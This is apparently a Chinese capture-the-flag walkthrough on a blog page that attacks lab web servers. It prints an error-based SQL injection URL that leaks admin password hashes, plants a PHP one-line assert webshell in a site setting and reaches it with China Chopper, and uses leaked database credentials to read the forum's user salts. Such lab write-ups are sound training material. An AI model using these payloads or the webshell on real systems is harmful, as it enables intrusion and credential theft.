专栏首页小白安全在线挑战详细攻略-《渗透测试笔记》

在线挑战详细攻略-《渗透测试笔记》

Step 01

> 目标地址:172.16.12.2 172.16.12.3(注意:本实验中一共有两个目标地址)

本机地址:172.16.11.2

第一题的要求是获取ww.test.ichunqiu后台登录密码。

首先打开浏览器,进入首页ww.test.ichunqiu, 自己注册一个账户,进入 [会员中心],点击左侧菜单 [专题管理] 下的 [创建专题],详情如下图所示:

> 专题名称、专题分类、权限设置、专题封面等信息自由填写;

> 专题创建完毕之后,点击 [专题管理],在右边的专题列表中选中刚才创建的专题,点击进入,查看URL地址,记住这个ID,后面需要这个ID;

> 打开浏览器的HackBar,在URL中输入以下信息:

http://www.test.ichunqiu/member/special.php?

job=show_BBSiframe&type=myatc&id=12&

TB_pre=qb_module where 1=1 or 1=updatexml(2,concat(0x7e,

((select concat(username,0x5c,password) from qb_members limit 0,1))),0) %23

请求完毕后可以很明显的看出,响应包返回的报错信息中,包含了管理员的用户名和一部分密码hash值,不过MD5长度不够,没关系,继续往下看;

> 在确定了管理员用户名为admin之后,继续修改刚才的exp,曝出完整hash

http://www.test.ichunqiu/member/special.php?

job=show_BBSiframe&type=myatc&id=12&

TB_pre=qb_module where 1=1 or 1=updatexml(2,concat(0,

((select concat(password) from qb_members limit 0,1))),0) %23

> 执行exp之后,32位的MD5值完美呈现,破解后获得明文密码:whoami!@#123,这就是第一题的答案,继续看第二步。

Step 02

> 第二题的要求是获取目标服务器1管理员桌面的Flag文件信息。

打开后台地址,输入之前获得的管理员用户名和密码;(后台地址是/admin,不会的童鞋用想念御剑一类的工具一跑就出来了)

> 成功登入后台管理系统,网站管理员权限!

下一步的目标是挂马,getshell

点击顶部菜单栏中的 [系统功能],再在对应的左侧菜单中点 [击全局参数设置],在右侧页面内容中找到 [网站备案号] 一栏,把一句话木马写入该处:

<?php @assert($_POST['ichunqiu']);?>

注意:这里不能使用eval,否则会被截断,会木马无法正常执行,不信你可以试一试~

然后点击页面下方的 [保存] 设置进行保存。一般情况下,网站页面的底部都会放网站备案信息,所以把一句话木马放在这里,方便利用。

> 继续点击左侧菜单中的 [频道独立页管理],在后侧页面内容中点击 [添加频道页],频道页名称任意输入,程序文件名无需修改,静态文件名:xxx.php,特!别!注!意!,扩展名须是php的,不然菜刀连不上;这三个信息填写完毕之后,点击下方的 [提交] 按钮,进行页面的保存操作;

> 新增的频道页保存成功之后,列表中会新增一条信息,如下所示:

> 最关键的时刻到来了,点击 [静态化] 按钮,对页面进行静态化处理!

> 出现如下页面说明静态化操作成功!此时的木马已经被默默的挂在了页面的底部,就存放在网站备案信息那里~

> 请出久违的菜刀同志,新增一条记录,URL信息就是刚才静态化过的页面地址,注意"连接密码"一定要跟一句话木马中的信息保持一致:

> 双击进入,成功!不过Flag还没找到呢,继续~

> 回到菜刀列表页面,在URL上右击,在弹出菜单中选择 [虚拟终端]:

> 进入虚拟终端后,教大家一个简单方法找Flag文件,直接在C盘根目录下,输入命令:

dir /s *flag*.txt

即可找到桌面文件下的Flag文件,type一下就能看到flag值。

这里特别说明一下,Flag文件中的内容是Key{636bb37e},但是在提交第二题答案的时候,只需要提交大括号中的8位字符即可,否则你永远得不了100分~

Step 03

> 第三题的要求是获取网站论坛数据库中admin的盐值,注意,不是网站数据库,是论坛数据库!

论坛的地址是bbs.test.ichunqiu, IP地址是172.16.12.3

在网站目录下发现一个dedecms_bak文件夹,该目录下的/data/common.inc.php文件就是论坛数据库的配置文件,准确说是配置文件的备份,里面有连接数据库需要的有用信息:

> 再次回到菜刀列表界面,在URL上点击右键,选择 [编辑],在配置栏中,输入刚才获得的数据库配置信息:

<T>MYSQL</T> <H>172.16.12.3</H> <U>root</U> <P>opiznmzs&**</P> <L>gbk</L>

配置信息输入完毕之后,点击界面上的 [编辑] 按钮完成此次信息修改;

> 激动人心的时刻终于来了,在URL上点右键,选择 [数据库管理]:

> 成功获取数据库信息,盐值在ultrax数据库下pre_ucenter_members表中,至于怎么知道盐值在这个位置的,我是在本地搭建了环境,自己一个一个翻出来的,方法比较笨,你如果有好的方法,还望多多指正!

>

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 小白博客 SQL注入实战

    本文仅供学习交流,目的是为了构建更加安全的网络环境! 注入地址 某VIP会员专用系统http://www.tcmpv.com/index.php/...

    奶糖味的代言
  • ClickJacking攻击-获取管理员权限

    前言 有一段时间没做测试了,偶尔的时候也会去挖挖洞。本文章要写的东西是我利用ClickJacking拿下管理员权限的测试过程。但在说明过程之前,先带大...

    奶糖味的代言
  • EMLOG更改后台地址导致微语表情不显示解决方法

    解决办法: 在include/lib/function.base.php中找到一下代码 /** * 替换表情 * * @param $t */ ...

    奶糖味的代言
  • 15(进程间通信)

    管道是Unix系统IPC最古老的方式。管道有下列两种局限性: (1) 历史上,它们是半双工的(即数据只能在一个方向上流动)。 (2) 它们只能在具有公共...

    提莫队长
  • 运营同学如何防止活动中系统扑街 ?

    运营同学搞活动,最不希望看到的,恐怕就是系统扑街了。这种事情似乎没什么办法,公司程序员水平太次,总拖后腿,我能怎么办?我也很为难啊。其实,这事未必都是程序员的锅...

    姬小光
  • 软件测试之 控制流图 圈复杂度 独立路径 测试用例

    例题:void Sort ( int  iRecordNum, int iType)

    week
  • oracle 中关于null的操作

    空值     空值一般用NULL表示     一般表示未知的、不确定的值,也不是空格     一般运算符与其进行运算时,都会为空     空不与任何值相等   ...

    郑小超.
  • 关于null的操作

    空值     空值一般用NULL表示     一般表示未知的、不确定的值,也不是空格     一般运算符与其进行运算时,都会为空     空不与任何值相等   ...

    郑小超.
  • 一个Java程序猿眼中的前后端分离以及Vue.js入门

    前后端不分,Jsp 是一个非常典型写法,Jsp 将 HTML 和 Java 代码结合在一起,刚开始的时候,确实提高了生产力,但是时间久了,大伙就发现 Jsp 存...

    南风
  • UI篇-UINavigationController之易忘补充

    [UIApplication sharedApplication].statusBarHidden = YES;

    進无尽

扫码关注云+社区

领取腾讯云代金券